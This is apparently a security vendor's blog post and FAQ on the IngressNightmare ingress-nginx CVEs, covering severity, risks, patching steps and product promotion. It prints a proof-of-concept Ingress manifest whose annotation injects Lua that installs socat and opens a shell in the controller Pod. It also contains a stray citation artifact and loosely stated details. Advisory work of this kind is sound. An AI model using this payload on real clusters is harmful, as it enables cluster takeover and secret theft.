Frequently Asked Questions

Vulnerabilities & Security Risks

What are CVE-2025-1974, CVE-2025-1097, CVE-2025-1098, and CVE-2025-24514?

These four critical vulnerabilities, collectively known as IngressNightmare, affect the Kubernetes ingress-nginx controller prior to v1.11.5 / v1.12.1. They stem from unsanitized Ingress annotations and admission-webhook inputs, allowing attackers to inject arbitrary NGINX directives into the auto-generated nginx.conf. This can lead to remote code execution (RCE), secret theft, lateral movement, and full cluster compromise. For details, see the IONIX blog post.

What is the CVSS score for the CVE-2025-1974 vulnerability?

The CVSS 3.1 score for CVE-2025-1974 is 9.8 (Critical). This vulnerability involves a webhook/validating-admission bypass and is patched in controller versions v1.11.5 and v1.12.1.

What is the proof-of-concept exploit for CVE-2025-1098?

The proof-of-concept exploit for CVE-2025-1098 involves creating an Ingress object with malicious annotations, such as nginx.ingress.kubernetes.io/mirror-target. This annotation can inject Lua code to spawn a reverse shell inside the controller Pod, allowing attackers to pivot to the Kubernetes API using the mounted token.

What is the impact of CVE-2025-1974 on Kubernetes clusters?

CVE-2025-1974 allows attackers to post a crafted AdmissionReview object directly to the validating-webhook, exposing a code-injection point without creating an Ingress object. This can compromise clusters even if workloads have no RBAC rights.

What are the risks associated with these vulnerabilities?

Risks include secret and credential theft (potentially exposing every credential stored in the cluster), full cluster compromise (attackers can create privileged pods, deploy cryptominers, or tamper with supply-chain pipelines), persistent backdoors (malicious NGINX directives survive across Pod restarts until the controller image is upgraded), and regulatory impact (unauthorized access to sensitive data may trigger breach-notification obligations and fines).

What mitigation steps should be taken for these vulnerabilities?

Mitigation steps include upgrading the ingress-nginx controller to v1.11.5 or v1.12.1, enabling strict annotation validation, trimming ServiceAccount privileges, network-segmenting the controller, and deploying the IONIX Exposure Management Platform for continuous discovery, validation, and prioritized remediation of vulnerable ingress controllers. For details, see the IONIX blog post.

Do these CVEs impact me?

IONIX is actively tracking these vulnerabilities. The security research team has developed a full exploit-simulation model based on published exploits, allowing assessment of which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

Product Features & Capabilities

What products and services does IONIX offer?

IONIX specializes in cybersecurity solutions, with a platform focused on attack surface risk management. Key features include Attack Surface Discovery, Risk Assessment, Risk Prioritization, and Risk Remediation. The platform helps discover all that matters, monitor changing attack surfaces, and ensure more assets are covered with less noise. Learn more at Attack Surface Discovery.

What are the key capabilities and benefits of IONIX?

IONIX offers complete external web footprint identification, proactive security management, real attack surface visibility, continuous discovery and inventory, and streamlined remediation. These capabilities help organizations improve risk management, reduce mean time to resolution (MTTR), and optimize security operations. For more details, visit Why Ionix.

What integrations does IONIX support?

IONIX integrates with tools such as Jira, ServiceNow, Slack, Splunk, Microsoft Sentinel, Palo Alto Cortex/Demisto, and AWS services including AWS Control Tower, AWS PrivateLink, and pre-trained Amazon SageMaker Models. For a full list, visit IONIX Integrations.

Does IONIX offer an API?

Yes, IONIX provides an API that supports integrations with major platforms like Jira, ServiceNow, Splunk, Cortex XSOAR, and more. For details, visit IONIX Integrations.

What compliance certifications does IONIX have?

IONIX is SOC2 compliant and supports companies with their NIS-2 and DORA compliance, ensuring robust security measures and regulatory alignment.

Use Cases & Customer Success

Who are some of IONIX's customers?

IONIX's customers include Infosys, Warner Music Group, The Telegraph, E.ON, Grand Canyon Education, and a Fortune 500 Insurance Company. For more details, visit IONIX Customers.

Can you share specific case studies or success stories?

Yes. For example, E.ON used IONIX to continuously discover and inventory their internet-facing assets and external connections, improving risk management (read more). Warner Music Group boosted operational efficiency and aligned security operations with business goals (learn more). Grand Canyon Education enhanced security measures by proactively discovering and remediating vulnerabilities (details).

What industries are represented in IONIX's case studies?

Industries include Insurance and Financial Services, Energy, Critical Infrastructure, IT and Technology, and Healthcare.

Who is the target audience for IONIX?

The target audience includes Information Security and Cybersecurity VPs, C-level executives, IT managers, and security managers, across industries including Fortune 500 companies.

Implementation & Support

How long does it take to implement IONIX and how easy is it to start?

Getting started with IONIX is simple and efficient. Initial deployment takes about a week and requires only one person to implement and scan the entire network. Customers have access to onboarding resources like guides, tutorials, webinars, and a dedicated Technical Support Team. For more details, visit this page.

What training and technical support is available to help customers get started?

IONIX offers streamlined onboarding resources such as guides, tutorials, webinars, and a dedicated Technical Support Team to assist customers during the implementation process. For more details, visit this page.

What customer service or support is available after purchase?

IONIX provides technical support and maintenance services during the subscription term, including troubleshooting, upgrades, and maintenance. Customers are assigned a dedicated account manager and benefit from regular review meetings to address issues and ensure smooth operation. For more details, visit this page.

Performance, Recognition & Differentiation

How does IONIX perform compared to competitors?

IONIX's ML-based 'Connective Intelligence' finds more assets than competing products while generating far fewer false positives. The Threat Exposure Radar feature helps teams prioritize the most urgent and critical security issues. IONIX automatically maps attack surfaces and their digital supply chains to the nth degree, and offers streamlined remediation with off-the-shelf integrations. For more, see Why IONIX.

What industry recognition has IONIX received?

IONIX earned top ratings for product innovation, security, functionality, and usability. It was named a leader in the Innovation and Product categories of the ASM Leadership Compass for completeness of product vision and a customer-oriented, cutting-edge approach to ASM. For more details, visit this page.

What feedback have customers given about IONIX's ease of use?

Customers have rated IONIX as generally user-friendly and appreciate having a dedicated account manager who ensures smooth communication and support during usage.

Resources & Documentation

Where can I find technical documentation and resources for IONIX?

Technical documentation, guides, datasheets, and case studies are available on the IONIX resources page. Visit IONIX Resources.

Does IONIX have a blog and what content does it provide?

Yes, IONIX's blog covers cybersecurity topics, exposure management, vulnerability management, and industry trends. Key authors include Amit Sheps and Fara Hain. Visit the IONIX Blog for the latest articles.

Where can I find more information about the Ingress-NGINX RCE vulnerabilities?

Detailed information about the Ingress-NGINX RCE vulnerabilities is available on the IONIX blog at this link.

Go back to All Blog posts

Exploited! Ingress-NGINX CONTROLLER FOR Ingress-NGINX RCE (CVE-2025-1974, 1097, 1098, 24514) – Patch Now | IONIX

Amit Sheps
Amit Sheps Director of Product Marketing LinkedIn
March 23, 2025
Alert: Multiple remote code execution vulnerabilities in Ingress Nginx Controller for Kubernetes have been exploited.

Kubernetes ingress-nginx has disclosed a cluster of critical vulnerabilities—CVE-2025-1974, CVE-2025-1097, CVE-2025-1098, and CVE-2025-24514—impacting all controller releases prior to v1.11.5 / v1.12.1. The flaws stem from insufficient sanitization of Ingress annotations and admission-webhook inputs, allowing attackers to inject arbitrary NGINX directives into the auto-generated nginx.conf. Successful exploitation can escalate to full remote-code execution in the controller Pod, facilitating secret theft, lateral movement, and complete cluster takeover.

What are CVE-2025-1974, CVE-2025-1097, CVE-2025-1098 & CVE-2025-24514?

Four high-impact flaws—collectively dubbed IngressNightmare—affect the Kubernetes ingress-nginx controller prior to v1.11.5 / v1.12.1. All stem from unsanitised Ingress annotations that the admission controller copies verbatim into the generated nginx.conf, enabling arbitrary directive injection and Remote Code Execution (RCE):

CVEAnnotation vectorCVSS 3.1Patched in
2025-1974Webhook / validatingadmission bypass9.8 Critical1.11.5 / 1.12.1
2025-1097auth-tls-match-cn8.8 High1.11.5 / 1.12.1
2025-1098mirror-target, mirror-host8.8 High1.11.5 / 1.12.1
2025-24514auth-url8.8 High1.11.5 / 1.12.1

Because the controller ServiceAccount typically holds cluster-wide Secret read permissions, successful exploitation grants attackers access to every credential stored in the cluster.

Exploiting the Vulnerability

Below is a minimal proof-of-concept Ingress that weaponises CVE-2025-1098 (the annotation changes for the other CVEs):

apiVersion: networking.k8s.io/v1

kind: Ingress

metadata:

  name: pwn-nginx

  annotations:

    nginx.ingress.kubernetes.io/mirror-target: |

      ;lua_shared_dict ionix 10m;

      init_by_lua_block {

        os.execute("apk add --no-cache socat");

        os.execute("socat tcp-listen:4444,reuseaddr,fork exec:/bin/sh &");

      };

spec:

  rules:

  - host: vulnerable.demo

    http:

      paths:

      - path: /

        pathType: Prefix

        backend:

          service:

            name: demo

            port:

              number: 80
  1. The semicolon (;) terminates the expected directive.
  2. Attacker-controlled Lua code is appended, spawning a reverse shell inside the controller Pod.
  3. On reload, NGINX executes the payload with the controller’s privileges, letting the attacker pivot to the Kubernetes API using the mounted token.

CVE-2025-1974 is even deadlier: a crafted AdmissionReview object posted directly to the validating-webhook exposes the same code-injection point without creating an Ingress object first, so even workloads with no RBAC rights can compromise the cluster.

Potential Risks

  • Secret & credential theft – every Secret the controller can access (often the whole cluster) is exposed.
  • Full cluster compromise – with a valid token, attackers can create privileged pods, deploy cryptominers, or tamper with supply-chain pipelines.
  • Persistent backdoors – malicious NGINX directives survive across Pod restarts until the controller image is upgraded.
  • Regulatory impact – unauthorised access to PII, PHI, or cardholder data may trigger breach-notification obligations and hefty fines.

Mitigation Steps

  1. Upgrade immediately
helm repo update ingress-nginx
helm upgrade nginx ingress-nginx/ingress-nginx \
  --version 4.13.0          # ships controller 1.12.1

Fixed controller tags: v1.11.5 and v1.12.1. citeturn2search0turn3search2

  1. Enable strict annotation validation
controller:
  extraArgs:
    enable-annotation-validation: "true"
  1. Trim ServiceAccount privileges

Bind the controller to a namespace-scoped Role that only watches Ingresses; block cluster-wide secrets access.

  1. Network-segment the controller

Deny egress except to the API server; use NetworkPolicies or CNI firewalls to prevent pod-to-controller traffic.

  1. Continuous Threat Exposure Management

Deploy the IONIX Exposure Management Platform to continuously discover vulnerable ingress controllers, validate exploitability, and drive prioritized, automated remediation across the attack surface.

Do these CVEs impact me?

IONIX is actively tracking these vulnerabilities. Our security research team has developed a full exploit-simulation model based on the published exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.

WATCH A SHORT IONIX DEMO

See how easy it is to implement a CTEM program with IONIX. Find and fix exploits fast.

THE LATEST FROM IONIX

Billy Hoffman
October 9, 2025
Exposed, Misconfigured and Forgotten: The Triple Threat of External Risk (and how to fix with Cloudflare and IONIX) 
Learn more
Tal Zamir
September 26, 2025
CVE-2025-20333: Authenticated RCE in Cisco ASA / FTD VPN Web Server
Learn more
Itay Paz Slavin
September 22, 2025
Exposed AI Agents in the Wild: How a Public MCP Server Let Us Peek Inside Its Host
Learn more